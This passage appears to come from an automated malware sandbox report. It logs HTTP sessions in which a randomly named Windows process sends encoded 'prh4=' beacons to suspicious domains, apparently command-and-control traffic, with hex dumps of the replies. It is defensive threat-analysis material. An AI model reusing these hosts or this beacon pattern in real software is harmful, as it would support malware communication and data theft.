                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1688&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1799&delivery_rate=0&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 37 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 7a\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      36 | 192.168.2.10 | 50012 | 188.114.96.3 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:25:09.772489071 CET | 498 | OUT | GET /1ag2/?prh4=4VB/N4F6tibqC9FTErplINOthlfgxvKF4YtEqiz3GsaSMOHPZtZI38ZqeQNXmBxLoc2gIm7YkXHcJ/CISLsxY8XxMzohQjeM2qyI6vORstQK1Dv1jg==&_VK8=7pXD8zQxGFxP HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.mydreamdeal.click
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Nov 20, 2024 09:25:10.504965067 CET | 1043 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:25:10 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                      Expires: Wed, 20 Nov 2024 08:25:10 GMT
                                                                      Vary: Accept-Encoding
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=luQuSe9vfCf9yA13%2ByaiBmn4CT9%2BFx5a6QiVowTbU6dtGWae%2BHnff8NXMJH9UR8eK3YlvjKD4lf6xEe4BqCbEuBoT%2FpIdHQtLGUFz7mAnihq99gnN0msim%2BEChEMokloYcP9vMXh1q4%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e570c3eae16440d-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1561&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=498&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 39 33 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 93<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      37 | 192.168.2.10 | 50013 | 194.245.148.189 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:25:17.161294937 CET | 765 | OUT | POST /dvmh/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.maitreyatoys.world
                                                                      Origin: http://www.maitreyatoys.world
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 193
                                                                      Connection: close
                                                                      Referer: http://www.maitreyatoys.world/dvmh/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 6c 48 67 6b 62 2b 61 38 6d 43 6e 63 43 4a 63 67 76 59 4c 67 53 6e 35 33 65 64 43 71 36 64 63 46 5a 30 61 57 7a 32 7a 73 71 46 42 2b 67 45 4b 43 70 6f 76 6e 33 31 4d 5a 69 79 34 74 6f 55 73 58 50 6b 62 54 2b 4c 35 57 59 68 67 35 45 6e 54 5a 44 34 32 5a 49 57 36 79 39 72 67 6e 46 62 53 68 6d 52 65 2f 59 6e 2b 61 52 66 4e 44 52 46 73 5a 77 46 30 68 64 56 48 52 61 33 4b 71 68 6c 31 69 74 4f 4a 76 64 68 71 56 58 6d 57 74 39 56 4c 33 2b 69 55 4e 31 32 42 2b 45 70 6d 57 4a 4d 4f 33 78 52 78 35 34 70 75 6c 56 4d 4a 69 6e 70 62 6a 36 70 35 2b 63 66 2b 64 76 49 42 68
                                                                      Data Ascii: prh4=lHgkb+a8mCncCJcgvYLgSn53edCq6dcFZ0aWz2zsqFB+gEKCpovn31MZiy4toUsXPkbT+L5WYhg5EnTZD42ZIW6y9rgnFbShmRe/Yn+aRfNDRFsZwF0hdVHRa3Kqhl1itOJvdhqVXmWt9VL3+iUN12B+EpmWJMO3xRx54pulVMJinpbj6p5+cf+dvIBh
                                                                      Nov 20, 2024 09:25:17.778320074 CET | 165 | IN | HTTP/1.1 403 Forbidden
                                                                      Server: nginx
                                                                      Date: Wed, 20 Nov 2024 08:25:17 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Nov 20, 2024 09:25:17.778556108 CET | 157 | IN | Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72
                                                                      Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      38 | 192.168.2.10 | 50014 | 194.245.148.189 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:25:19.716865063 CET | 789 | OUT | POST /dvmh/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.maitreyatoys.world
                                                                      Origin: http://www.maitreyatoys.world
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 217
                                                                      Connection: close
                                                                      Referer: http://www.maitreyatoys.world/dvmh/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 6c 48 67 6b 62 2b 61 38 6d 43 6e 63 44 6f 73 67 70 2f 66 67 46 58 35 6f 62 64 43 71 31 39 63 42 5a 30 6d 57 7a 33 33 38 71 77 78 2b 68 6c 36 43 6d 4a 76 6e 30 31 4d 5a 70 53 34 30 31 45 74 36 50 6b 6d 67 2b 4f 35 57 59 68 30 35 45 6d 6a 5a 44 76 69 61 4a 47 36 30 32 4c 67 66 4c 37 53 68 6d 52 65 2f 59 6b 43 38 52 66 31 44 51 32 6b 5a 77 6e 4d 67 58 31 48 65 4d 6e 4b 71 79 31 31 6d 74 4f 49 36 64 67 47 2f 58 6b 75 74 39 56 62 33 2b 77 73 53 6d 57 42 38 41 70 6e 76 4b 65 75 6e 30 45 45 46 33 34 75 65 4e 73 49 4c 67 49 6d 6b 72 34 59 70 50 6f 69 54 68 4f 30 4c 62 6f 69 35 42 33 42 43 6b 7a 52 6c 63 36 32 67 58 36 41 6b 57 67 3d 3d
                                                                      Data Ascii: prh4=lHgkb+a8mCncDosgp/fgFX5obdCq19cBZ0mWz338qwx+hl6CmJvn01MZpS401Et6Pkmg+O5WYh05EmjZDviaJG602LgfL7ShmRe/YkC8Rf1DQ2kZwnMgX1HeMnKqy11mtOI6dgG/Xkut9Vb3+wsSmWB8ApnvKeun0EEF34ueNsILgImkr4YpPoiThO0Lboi5B3BCkzRlc62gX6AkWg==
                                                                      Nov 20, 2024 09:25:20.321371078 CET | 322 | IN | HTTP/1.1 403 Forbidden
                                                                      Server: nginx
                                                                      Date: Wed, 20 Nov 2024 08:25:20 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      39 | 192.168.2.10 | 50015 | 194.245.148.189 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:25:22.262732983 CET | 1802 | OUT | POST /dvmh/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.maitreyatoys.world
                                                                      Origin: http://www.maitreyatoys.world
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 1229
                                                                      Connection: close
                                                                      Referer: http://www.maitreyatoys.world/dvmh/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 6c 48 67 6b 62 2b 61 38 6d 43 6e 63 44 6f 73 67 70 2f 66 67 46 58 35 6f 62 64 43 71 31 39 63 42 5a 30 6d 57 7a 33 33 38 71 77 35 2b 67 54 6d 43 6e 71 48 6e 31 31 4d 5a 79 79 34 70 31 45 74 43 50 6b 2b 73 2b 4f 39 47 59 6a 4d 35 45 45 72 5a 55 4f 69 61 51 32 36 30 35 72 67 6b 46 62 53 30 6d 51 75 7a 59 6b 53 38 52 66 31 44 51 32 49 5a 32 31 30 67 52 31 48 52 61 33 4b 75 68 6c 31 4f 74 4e 34 71 64 67 7a 49 58 58 6d 74 39 30 72 33 79 6a 55 53 38 57 42 79 48 70 6e 65 4b 65 6a 67 30 41 64 30 33 34 61 30 4e 75 59 4c 6a 5a 2f 61 76 63 63 6a 63 6f 75 36 6e 6f 67 66 62 34 71 34 4c 6b 30 52 73 69 63 34 45 49 6a 79 66 37 55 76 4e 78 61 6c 5a 31 35 57 6d 53 62 4a 67 57 6e 51 79 30 6c 6a 79 45 6a 67 49 39 4c 54 6c 6a 4c 64 43 48 4a 33 71 51 4e 6b 41 65 69 63 56 56 51 6d 39 79 42 2b 6c 75 4e 53 62 57 73 4d 73 5a 4c 58 6b 66 64 52 6f 48 6c 58 54 36 2b 5a 63 4f 6b 4d 74 37 65 6f 6f 6a 5a 5a 4f 41 6a 56 58 54 7a 2b 49 31 56 43 54 76 59 49 65 6a 65 4e 76 47 31 32 51 50 4b 44 6e 4e 37 43 7a 55 78 2f 4a [TRUNCATED]
                                                                      Data Ascii: prh4= [TRUNCATED]
                                                                      Nov 20, 2024 09:25:22.866837025 CET | 322 | IN | HTTP/1.1 403 Forbidden
                                                                      Server: nginx
                                                                      Date: Wed, 20 Nov 2024 08:25:22 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      40 | 192.168.2.10 | 50016 | 194.245.148.189 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:25:24.807418108 CET | 499 | OUT | GET /dvmh/?prh4=oFIEYIO2gjvnF7Mvhq7sL0t2a9Wv2ONAMWbI9WLDgwNy2jujsZOasn0dsRYzh1BdbVLS+4ZlfSYhPFaSDYrrOj2l86R3Os3ZjQmQABGtMbl8YFkRqw==&_VK8=7pXD8zQxGFxP HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.maitreyatoys.world
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Nov 20, 2024 09:25:25.416529894 CET | 242 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Wed, 20 Nov 2024 08:25:25 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Content-Length: 1840
                                                                      Last-Modified: Tue, 04 Apr 2017 13:56:46 GMT
                                                                      Connection: close
                                                                      ETag: "58e3a61e-730"
                                                                      Accept-Ranges: bytes
                                                                      Nov 20, 2024 09:25:25.416614056 CET | 1236 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> ... The above 3 meta
                                                                      Nov 20, 2024 09:25:25.416697025 CET | 604 | IN | Data Raw: 7a 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 3c 70 3e 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 6c 67 20 62 74 6e 2d 73 75 63 63 65 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 6f 6b 65 72 2e 63 6f 6d 2f 3f
                                                                      Data Ascii: zation.</p> <p><a class="btn btn-lg btn-success" href="https://joker.com/?pk_campaign=Parking&pk_kwd=text" role="button">JOKER.COM</a></p> </div> <footer class="footer"> <p>&copy; 2017 CSL GmbH / JOKER.COM</p>


                                                                      Session ID: 41 | Source IP: 192.168.2.10 | Source Port: 50017 | Destination IP: 199.59.243.227 | Destination Port: 80 | PID: 6808 | Process: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:25:30.621889114 CET | 777 | OUT | POST /pn0u/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.dating-apps-az-dn5.xyz
                                                                      Origin: http://www.dating-apps-az-dn5.xyz
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 193
                                                                      Connection: close
                                                                      Referer: http://www.dating-apps-az-dn5.xyz/pn0u/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 75 45 47 55 70 6a 72 30 6f 4d 64 69 4b 76 69 45 4d 71 53 33 67 78 34 55 2b 33 54 45 50 2b 32 32 6c 46 4b 74 7a 6a 47 62 49 6d 72 54 50 44 53 56 6c 4c 48 66 44 70 57 2f 68 48 72 79 78 39 2f 30 75 54 6f 72 32 4a 6b 78 56 5a 53 78 56 4e 74 58 30 42 52 4b 71 6d 4f 70 4c 71 4d 63 56 5a 6a 42 6a 54 66 58 6c 49 6e 78 53 63 4d 48 51 7a 6c 71 53 4b 5a 6e 48 78 53 39 73 70 36 35 38 4c 44 77 61 68 7a 75 2f 6d 6d 4a 78 53 55 33 6a 33 32 37 4f 53 74 5a 63 4c 32 49 77 4f 67 77 4b 53 71 64 6f 31 2b 45 41 2b 44 64 48 2f 35 4f 55 55 59 61 4f 58 71 38 72 65 71 36 48 58 6d 36
                                                                      Data Ascii: prh4=uEGUpjr0oMdiKviEMqS3gx4U+3TEP+22lFKtzjGbImrTPDSVlLHfDpW/hHryx9/0uTor2JkxVZSxVNtX0BRKqmOpLqMcVZjBjTfXlInxScMHQzlqSKZnHxS9sp658LDwahzu/mmJxSU3j327OStZcL2IwOgwKSqdo1+EA+DdH/5OUUYaOXq8req6HXm6
                                                                      Nov 20, 2024 09:25:31.060921907 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                      date: Wed, 20 Nov 2024 08:25:30 GMT
                                                                      content-type: text/html; charset=utf-8
                                                                      content-length: 1154
                                                                      x-request-id: e1992aca-ff1a-4d9b-81a8-6f34806f13db
                                                                      cache-control: no-store, max-age=0
                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                      vary: sec-ch-prefers-color-scheme
                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bWcZewp8eISZBr0lUYb166dr3nPAuKFm8lkyMSyz0VztdD3st25mfrrotBOQpEyYQuOCOGrRVeBKclo1TlhzHg==
                                                                      set-cookie: parking_session=e1992aca-ff1a-4d9b-81a8-6f34806f13db; expires=Wed, 20 Nov 2024 08:40:31 GMT; path=/
                                                                      connection: close
                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 62 57 63 5a 65 77 70 38 65 49 53 5a 42 72 30 6c 55 59 62 31 36 36 64 72 33 6e 50 41 75 4b 46 6d 38 6c 6b 79 4d 53 79 7a 30 56 7a 74 64 44 33 73 74 32 35 6d 66 72 72 6f 74 42 4f 51 70 45 79 59 51 75 4f 43 4f 47 72 52 56 65 42 4b 63 6c 6f 31 54 6c 68 7a 48 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bWcZewp8eISZBr0lUYb166dr3nPAuKFm8lkyMSyz0VztdD3st25mfrrotBOQpEyYQuOCOGrRVeBKclo1TlhzHg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                      Nov 20, 2024 09:25:31.060949087 CET | 607 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZTE5OTJhY2EtZmYxYS00ZDliLTgxYTgtNmYzNDgwNmYxM2RiIiwicGFnZV90aW1lIjoxNzMyMDkxMT


                                                                      Session ID: 42 | Source IP: 192.168.2.10 | Source Port: 50018 | Destination IP: 199.59.243.227 | Destination Port: 80 | PID: 6808 | Process: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:25:33.167146921 CET | 801 | OUT | POST /pn0u/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.dating-apps-az-dn5.xyz
                                                                      Origin: http://www.dating-apps-az-dn5.xyz
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 217
                                                                      Connection: close
                                                                      Referer: http://www.dating-apps-az-dn5.xyz/pn0u/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 75 45 47 55 70 6a 72 30 6f 4d 64 69 59 2b 53 45 4b 4e 2b 33 31 42 34 58 37 33 54 45 64 2b 32 79 6c 46 47 74 7a 6e 57 4c 4c 56 66 54 50 68 36 56 6b 4b 48 66 43 70 57 2f 76 6e 72 37 2f 64 2f 7a 75 54 30 4e 32 4d 6b 78 56 5a 32 78 56 4a 39 58 6f 69 35 4a 73 6d 4f 38 48 4b 4d 53 59 35 6a 42 6a 54 66 58 6c 49 6a 49 53 63 55 48 51 6a 56 71 55 66 6c 6f 45 78 53 38 6c 4a 36 35 75 37 44 4b 61 68 7a 32 2f 6a 50 73 78 51 63 33 6a 79 61 37 50 44 74 47 53 4c 33 44 76 65 68 51 50 7a 43 59 6c 32 47 76 48 59 48 51 57 4a 64 34 58 31 6c 64 66 47 4c 72 34 70 32 30 4a 52 54 51 4c 46 36 72 50 68 49 65 63 4e 69 37 34 55 45 73 54 6a 73 2b 41 41 3d 3d
                                                                      Data Ascii: prh4=uEGUpjr0oMdiY+SEKN+31B4X73TEd+2ylFGtznWLLVfTPh6VkKHfCpW/vnr7/d/zuT0N2MkxVZ2xVJ9Xoi5JsmO8HKMSY5jBjTfXlIjIScUHQjVqUfloExS8lJ65u7DKahz2/jPsxQc3jya7PDtGSL3DvehQPzCYl2GvHYHQWJd4X1ldfGLr4p20JRTQLF6rPhIecNi74UEsTjs+AA==
                                                                      Nov 20, 2024 09:25:33.612307072 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                      date: Wed, 20 Nov 2024 08:25:33 GMT
                                                                      content-type: text/html; charset=utf-8
                                                                      content-length: 1154
                                                                      x-request-id: cc1d64f8-1624-43ce-907b-f3a3354842fd
                                                                      cache-control: no-store, max-age=0
                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                      vary: sec-ch-prefers-color-scheme
                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bWcZewp8eISZBr0lUYb166dr3nPAuKFm8lkyMSyz0VztdD3st25mfrrotBOQpEyYQuOCOGrRVeBKclo1TlhzHg==
                                                                      set-cookie: parking_session=cc1d64f8-1624-43ce-907b-f3a3354842fd; expires=Wed, 20 Nov 2024 08:40:33 GMT; path=/
                                                                      connection: close
